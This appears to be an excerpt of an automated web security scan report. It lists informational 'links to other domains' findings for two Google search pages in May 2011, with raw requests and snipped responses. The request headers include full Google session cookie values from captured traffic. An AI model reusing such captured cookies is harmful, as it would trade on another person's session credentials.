<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0M70R66xG5IJ:pittsburghdirectory.examiner.com/fried%2Bkane%2Bwalters%2Bzuschlag%2Band%2Bgrochmal.9.16420815p.home.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:0M70R66xG5IJ:pittsburghdirectory.examiner.com/fried%2Bkane%2Bwalters%2Bzuschlag%2Band%2Bgrochmal.9.16420815p.home.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEwQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2oSim0EuE6sJ:www.superlawyers.com/pennsylvania/lawfirm/Fried-Kane-Walters-Zuschlag-and-Grochmal/20fbe13d-a54b-43d2-952f-9422c9a65c37.html+Fried+Kane+Walters+Zuschlag+Grochmal&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal" class=l onmousedown="return clk(this.href,'','','','10','','0CFIQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:eJlOzFghDWoJ:pittsburgh.attorneydirectorydb.org/attorneys/fried-kane-walters-zuschlag-grochmal+Fried+Kane+Walters+Zuschlag+Grochmal&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFcQIDAJ')">Cached</a>
...[SNIP]...

19.50. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TPG+Capital

The response contains the following links to other domains:

http://biz.yahoo.com/ic/51/51545.html
http://en.wikipedia.org/wiki/TPG_Capital
http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23307
http://wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html
http://webcache.googleusercontent.com/search?q=cache:-O-vy4w_6YUJ:www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html+TPG+Capital&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:1ote0JSYFxkJ:www.linkedin.com/company/tpg-axon-capital+TPG+Capital&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:3uKyF7-ccsYJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D23307+TPG+Capital&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6xlcfNtqP1cJ:www.tpg.com/+TPG+Capital&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:CT_IcsFIBWEJ:www.fins.com/Finance/Companies/192/TPG-Capital+TPG+Capital&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:H2SIyp1wofkJ:wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html+TPG+Capital&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NoEaFuGlxAIJ:biz.yahoo.com/ic/51/51545.html+TPG+Capital&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZaEDv7jfxtwJ:www.tpg.com/about/index.html+TPG+Capital&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:fSPc5_nyCLwJ:en.wikipedia.org/wiki/TPG_Capital+TPG+Capital&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:y8yAkMVuOzoJ:www.tpgventures.com/+TPG+Capital&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.bloomberg.com/news/2011-05-09/tpg-said-to-seek-asia-chairman-to-assist-expansion-in-china.html
http://www.bloomberg.com/news/2011-05-11/landis-gyr-is-said-to-get-takeover-offers-from-toshiba-tpg-capital-eqt.html
http://www.bloomberg.com/news/2011-05-12/quintiles-raises-rate-to-fix-balance-sheet-corporate-finance.html
http://www.fins.com/Finance/Companies/192/TPG-Capital
http://www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html
http://www.linkedin.com/company/tpg-axon-capital
http://www.tpg.com/
http://www.tpg.com/about/index.html
http://www.tpgventures.com/
http://www.youtube.com/results?q=TPG+Capital&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=TPG+Capital HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 88184

<!doctype html> <head> <title>TPG Capital - Google Search</title> <script>window.google={kEI:"ecHLTYCjLMby0gGQ8-jFBg",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,29
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=TPG+Capital&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpg.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6xlcfNtqP1cJ:www.tpg.com/+TPG+Capital&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpg.com/about/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CCUQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZaEDv7jfxtwJ:www.tpg.com/about/index.html+TPG+Capital&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCoQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/TPG_Capital" class=l onmousedown="return clk(this.href,'','','','3','','0CCwQFjAC')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/TPG_Capital#Private_equity_funds" onmousedown="return clk(this.href,'','','','3','','0CDMQ0gIoADAC')">Private equity funds</a> - <a href="http://en.wikipedia.org/wiki/TPG_Capital#History_and_notable_Investments" onmousedown="return clk(this.href,'','','','3','','0CDQQ0gIoATAC')">History and notable Investments</a> - <a href="http://en.wikipedia.org/wiki/TPG_Capital#Newbridge_Capital" onmousedown="return clk(this.href,'','','','3','','0CDUQ0gIoAjAC')">Newbridge Capital</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fSPc5_nyCLwJ:en.wikipedia.org/wiki/TPG_Capital+TPG+Capital&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDEQIDAC')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-11/landis-gyr-is-said-to-get-takeover-offers-from-toshiba-tpg-capital-eqt.html" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQqQIwAw')">Landis+Gyr Said to Receive Takeover Bids</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-12/quintiles-raises-rate-to-fix-balance-sheet-corporate-finance.html" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QqQIwBA')">Quintiles Raises Rate to Fix Balance Sheet: Corporate Finance</a>
...[SNIP]...
<span class=tl><a href="http://www.bloomberg.com/news/2011-05-09/tpg-said-to-seek-asia-chairman-to-assist-expansion-in-china.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEMQqQIwBQ')"><em>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23307" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3uKyF7-ccsYJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D23307+TPG+Capital&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:3uKyF7-ccsYJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D23307+TPG+Capital&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tpgventures.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CFQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y8yAkMVuOzoJ:www.tpgventures.com/+TPG+Capital&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-O-vy4w_6YUJ:www.hoovers.com/company/TPG_Capital_LP/hrhchi-1.html+TPG+Capital&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fins.com/Finance/Companies/192/TPG-Capital" class=l onmousedown="return clk(this.href,'','','','10','','0CGIQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CT_IcsFIBWEJ:www.fins.com/Finance/Companies/192/TPG-Capital+TPG+Capital&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://biz.yahoo.com/ic/51/51545.html" class=l onmousedown="return clk(this.href,'','','','11','','0CGkQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NoEaFuGlxAIJ:biz.yahoo.com/ic/51/51545.html+TPG+Capital&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHEQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/tpg-axon-capital" class=l onmousedown="return clk(this.href,'','','','12','','0CHQQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1ote0JSYFxkJ:www.linkedin.com/company/tpg-axon-capital+TPG+Capital&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHkQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html" class=l onmousedown="return clk(this.href,'','','','13','','0CHsQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:H2SIyp1wofkJ:wallstcheatsheet.com/trading/tpg-axon-capital-reduces-international-paper-stake.html+TPG+Capital&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIABECAwDA')">Cached</a>
...[SNIP]...

19.51. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2377286
http://webcache.googleusercontent.com/search?q=cache:41OsrPGt4C0J:www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm+Benesch+Friedlander+Coplan+%26+Aronoff&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:4qGvaRU9KV4J:www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6R0HGX921dEJ:www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10+Benesch+Friedlander+Coplan+%26+Aronoff&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6W5r763LijIJ:www.terralex.org/profile.aspx%3FIEntityId%3Dmm1000108209%26LocationId%3D1000108209+Benesch+Friedlander+Coplan+%26+Aronoff&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PxK1hD4nyEQJ:www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:RUUlMdQ1p6EJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2377286+Benesch+Friedlander+Coplan+%26+Aronoff&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:aOrOfpnN068J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX4340+Benesch+Friedlander+Coplan+%26+Aronoff&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ki56z_JzBIoJ:www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx%3FxpST%3DProfessionalSearch+Benesch+Friedlander+Coplan+%26+Aronoff&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:z7gSIAGCbGEJ:www.bfcalaw.com/+Benesch+Friedlander+Coplan+%26+Aronoff&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.beneschlaw.com/
http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUs
http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUsDiversity
http://www.beneschlaw.com/agoldner/
http://www.beneschlaw.com/careers/xprGeneralContentCareerFlash.aspx?xpST=CareersOverview
http://www.beneschlaw.com/contactus/xprContactUs1.aspx?xpST=ContactUs
http://www.beneschlaw.com/offices/xprOfficeList1.aspx?xpST=OfficeList
http://www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx?xpST=ProfessionalSearch
http://www.beneschlaw.com/services/xprServiceListBFCA.aspx?xpST=PracticeIndustryList
http://www.bfcalaw.com/
http://www.bricker.com/
http://www.calfee.com/
http://www.hahnlaw.com/
http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX4340
http://www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html
http://www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm
http://www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html
http://www.taftlaw.com/
http://www.terralex.org/profile.aspx?IEntityId=mm1000108209&LocationId=1000108209
http://www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10
http://www.youtube.com/results?q=Benesch+Friedlander+Coplan+%26+Aronoff&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80442

<!doctype html> <head> <title>Benesch Friedlander Coplan & Aronoff - Google Search</title> <script>window.google={kEI:"h8_LTeebEYLZ0QHv2pX2Bg",kEXPI:"17259,23756,24692,24878,24879,27400,281
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Benesch+Friedlander+Coplan+%26+Aronoff&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBsQFjAA')"><em>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx?xpST=ProfessionalSearch" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/offices/xprOfficeList1.aspx?xpST=OfficeList" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoATAA')">Locations</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/careers/xprGeneralContentCareerFlash.aspx?xpST=CareersOverview" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAjAA')">Join the Firm</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUs" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAzAA')">About the Firm</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/contactus/xprContactUs1.aspx?xpST=ContactUs" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBDAA')">Contact</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/services/xprServiceListBFCA.aspx?xpST=PracticeIndustryList" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBTAA')">Practice & Industry Groups</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/agoldner/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBjAA')">Allan Goldner</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUsDiversity" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBzAA')">Diversity</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQoAIwAQ')" title="Benesch Friedlander Coplan &amp; Aronoff" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQoAIwAQ')" title="Benesch Friedlander Coplan &amp; Aronoff"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDMQoAIwAg')" title="Benesch Friedlander Coplan &amp; Aronoff LLP" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDMQoAIwAg')" title="Benesch Friedlander Coplan &amp; Aronoff LLP"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx?xpST=ProfessionalSearch" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Attorneys Search | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ki56z_JzBIoJ:www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx%3FxpST%3DProfessionalSearch+Benesch+Friedlander+Coplan+%26+Aronoff&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ki56z_JzBIoJ:www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx%3FxpST%3DProfessionalSearch+Benesch+Friedlander+Coplan+%26+Aronoff&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2377286" class=l onmousedown="return clk(this.href,'','','','5','','0CEUQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RUUlMdQ1p6EJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2377286+Benesch+Friedlander+Coplan+%26+Aronoff&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:RUUlMdQ1p6EJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2377286+Benesch+Friedlander+Coplan+%26+Aronoff&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:41OsrPGt4C0J:www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm+Benesch+Friedlander+Coplan+%26+Aronoff&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:41OsrPGt4C0J:www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm+Benesch+Friedlander+Coplan+%26+Aronoff&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')">TopWorkplaces - Profile for "<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6R0HGX921dEJ:www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10+Benesch+Friedlander+Coplan+%26+Aronoff&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:6R0HGX921dEJ:www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10+Benesch+Friedlander+Coplan+%26+Aronoff&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.terralex.org/profile.aspx?IEntityId=mm1000108209&LocationId=1000108209" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')">TerraLex - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6W5r763LijIJ:www.terralex.org/profile.aspx%3FIEntityId%3Dmm1000108209%26LocationId%3D1000108209+Benesch+Friedlander+Coplan+%26+Aronoff&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:6W5r763LijIJ:www.terralex.org/profile.aspx%3FIEntityId%3Dmm1000108209%26LocationId%3D1000108209+Benesch+Friedlander+Coplan+%26+Aronoff&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html" class=l onmousedown="return clk(this.href,'','','','9','','0CGAQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4qGvaRU9KV4J:www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:4qGvaRU9KV4J:www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bfcalaw.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGYQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:z7gSIAGCbGEJ:www.bfcalaw.com/+Benesch+Friedlander+Coplan+%26+Aronoff&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:z7gSIAGCbGEJ:www.bfcalaw.com/+Benesch+Friedlander+Coplan+%26+Aronoff&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGsQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html" class=l onmousedown="return clk(this.href,'','','','11','','0CG0QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PxK1hD4nyEQJ:www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:PxK1hD4nyEQJ:www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHQQIDAK')">Cached</a>
...[SNIP]...
